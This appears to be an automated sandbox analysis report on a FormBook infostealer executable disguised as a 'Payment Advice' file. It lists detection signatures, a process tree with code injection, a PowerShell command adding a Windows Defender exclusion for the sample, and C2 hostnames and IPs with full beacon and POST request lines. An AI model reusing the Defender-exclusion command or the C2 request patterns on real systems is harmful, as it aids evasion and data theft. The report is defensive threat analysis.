Windows Analysis Report
Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe

Overview

General Information

Sample name: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
Analysis ID: 1571277
MD5: cedbf1d5c1bc7d923f885cd24bf225c1
SHA1: dd0e1b5cd5b14488e1f28ad127d5cd5e484a5ba2
SHA256: 58b21b1ecb14e234c09d14eb1a987f636f384ff0e1345bde2071bb87e90ae5d8
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe (PID: 1740 cmdline: "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe" MD5: CEDBF1D5C1BC7D923F885CD24BF225C1)
    • powershell.exe (PID: 7304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe" MD5: CEDBF1D5C1BC7D923F885CD24BF225C1)
      • vTCmFjyxUmdTJX.exe (PID: 3756 cmdline: "C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • finger.exe (PID: 7720 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • vTCmFjyxUmdTJX.exe (PID: 4136 cmdline: "C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7932 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", ParentImage: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ParentProcessId: 1740, ParentProcessName: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", ProcessId: 7304, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", ParentImage: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ParentProcessId: 1740, ParentProcessName: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", ProcessId: 7304, ProcessName: powershell.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-09T08:49:05.514764+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49768 | 172.247.112.164 | 80 | TCP
                2024-12-09T08:49:30.831726+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49830 | 13.248.169.48 | 80 | TCP
                2024-12-09T08:49:46.022760+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49868 | 156.253.8.115 | 80 | TCP
                2024-12-09T08:50:02.120683+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49908 | 37.97.254.27 | 80 | TCP
                2024-12-09T08:50:17.301606+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49947 | 199.193.6.134 | 80 | TCP
                2024-12-09T08:50:34.231659+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49990 | 149.104.34.134 | 80 | TCP
                2024-12-09T08:50:49.794564+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50029 | 124.6.61.130 | 80 | TCP

                AV Detection

                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ReversingLabs: Detection: 65%
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, Virustotal: Detection: 38%
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3552365141.00000000014E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236407879.0000000002F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, Joe Sandbox ML: detected
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001147000.00000004.00000020.00020000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000002.3552384724.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3551724972.000000000077E000.00000002.00000001.01000000.0000000C.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000000.2305994823.000000000077E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2234352082.000000000366C000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2236364471.0000000003813000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000009.00000003.2234352082.000000000366C000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2236364471.0000000003813000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001147000.00000004.00000020.00020000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000002.3552384724.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\finger.exe, Code function: 9_2_02F5C9E0 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\finger.exe, Code function: 4x nop then xor eax, eax (9_2_02F49E40)
                Source: C:\Windows\SysWOW64\finger.exe, Code function: 4x nop then mov ebx, 00000004h (9_2_038604E8)

                Networking

                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49768 -> 172.247.112.164:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49830 -> 13.248.169.48:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49868 -> 156.253.8.115:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49908 -> 37.97.254.27:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49947 -> 199.193.6.134:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49990 -> 149.104.34.134:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50029 -> 124.6.61.130:80
                Source: Joe Sandbox View, IP Address: 13.248.169.48
                Source: Joe Sandbox View, IP Address: 37.97.254.27
                Source: Joe Sandbox View, ASN Name: AMAZON-02US
                Source: Joe Sandbox View, ASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL
                Source: Joe Sandbox View, ASN Name: CNSERVERSUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /tvkp/?q0C=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.jgkgf.clubConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /09b7/?q0C=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.hsa.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6t0f/?q0C=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.sssvip2.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7ujc/?q0C=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.dutchdubliners.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rdvg/?q0C=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.allstary.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ah82/?q0C=ZJEy2f+tUkBEF+w+scawLBB5zJTblKgdMgFXComG0qR9kHSC6PuhPC8uHAjvWDylpvj6Mcz0IvFDuxOLTDxJzlfpwwLacPhih5HaTILNLTJtkK4jcOiAtOE=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.16v9tiu00r.inkConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.comect.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.jgkgf.club
                Source: global trafficDNS traffic detected: DNS query: www.hsa.world
                Source: global trafficDNS traffic detected: DNS query: www.sssvip2.shop
                Source: global trafficDNS traffic detected: DNS query: www.dutchdubliners.online
                Source: global trafficDNS traffic detected: DNS query: www.allstary.top
                Source: global trafficDNS traffic detected: DNS query: www.16v9tiu00r.ink
                Source: global trafficDNS traffic detected: DNS query: www.comect.online
                Source: global trafficDNS traffic detected: DNS query: www.emirates-visa.net
                Source: unknownHTTP traffic detected: POST /09b7/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enHost: www.hsa.worldOrigin: http://www.hsa.worldContent-Length: 200Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.hsa.world/09b7/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:25 GMTContent-Type: text/htmlContent-Length: 7931Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/ETag: "67516c07-1efb"Server: Anti-CDN
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:28 GMTContent-Type: text/htmlContent-Length: 7931Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/ETag: "67516c07-1efb"Server: Anti-CDN
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:31 GMTContent-Type: text/htmlContent-Length: 7931Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/ETag: "67516c07-1efb"Server: Anti-CDN
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:33 GMTContent-Type: text/htmlContent-Length: 7931Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/ETag: "67516c07-1efb"Server: Anti-CDN
                Source: finger.exe, 00000009.00000002.3553337559.0000000004D40000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.00000000042D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://comect.online/hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeString found in binary or memory: http://localhost/calculator_server/requests.php
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1867220338.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552365141.000000000153E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.emirates-visa.net
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552365141.000000000153E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.emirates-visa.net/6wmy/
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
